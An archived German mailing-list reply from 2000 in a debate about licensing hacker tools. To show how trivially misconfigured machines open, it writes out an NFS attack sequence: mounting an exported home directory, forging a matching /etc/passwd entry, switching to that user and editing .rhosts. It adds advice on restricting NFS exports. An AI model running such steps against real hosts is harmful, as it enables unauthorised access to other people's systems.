[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz

To: debate@fitug.de
Subject: Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz
From: Thomas Roessler <roessler@guug.de>
Date: Fri, 19 May 2000 09:58:34 +0200
Comment: This message comes from the debate mailing list.
In-Reply-To: <Pine.BSF.4.05.10005181934080.4967-100000@moritz.alleswirdgelber>; from uzs106@ibm.rhrz.uni-bonn.de on Thu, May 18, 2000 at 07:37:57PM +0200
Mail-Followup-To: debate@fitug.de
References: <20000518160901.7084.qmail@valiant.koehntopp.de> <Pine.BSF.4.05.10005181934080.4967-100000@moritz.alleswirdgelber>
Sender: owner-debate@fitug.de
User-Agent: Mutt/1.3i

On 2000-05-18 19:37:57 +0200, Heiko Recktenwald wrote:

> Um mal zu erkennen, was "grob fahrlaessig" ist, kannst
> Du mal erlaeutern, wie "trivial zu oeffnen" die Dinger
> sind ?

# mount -t nfs host:/home /mountpoint
# ls -ln /mountpoint/
# echo "einuser:<cpasswd>:<uid>:<gid>::/mountpoint/einuser:/bin/sh" >> /etc/passwd
# su - einuser
$ vi .rhosts

Zu "vi .rhosts" gibt es dann noch ein paar andere
Alternativen.  Danach hat man dann einen Nutzerzugang zu
dem betreffenden Rechner; der Schritt zu root dürfte eher
ein Kinderspiel sein.

> Was muesste der Betreiber jedenfalls tun ?

Sicherstellen, daß nicht jeder dahergelaufene Idiot seine
NFS-Platten mounten kann.

-- 
http://www.guug.de/~roessler/

Follow-Ups:
- Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz
  - From: Thomas Roessler <roessler@guug.de>

References:
- Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz
  - From: kris@koehntopp.de (Kristian Koehntopp)
- Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" fürHacker-Tools und:verdeckteErmittler im Netz
  - From: Heiko Recktenwald <uzs106@ibm.rhrz.uni-bonn.de>
- Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" fürHacker-Tools und:verdeckteErmittler im Netz
  - From: Heiko Recktenwald <uzs106@ibm.rhrz.uni-bonn.de>

Prev by Date: Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz
Next by Date: Re: Telekommunikationsfreiheit
Prev by thread: Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" fürHacker-Tools und:verdeckteErmittler im Netz
Next by thread: Re: [FYI] Brigitte Zypries (BMJ): "Waffenschein" für Hacker-Tools und:verdeckteErmittler im Netz
Index(es):
- Date
- Thread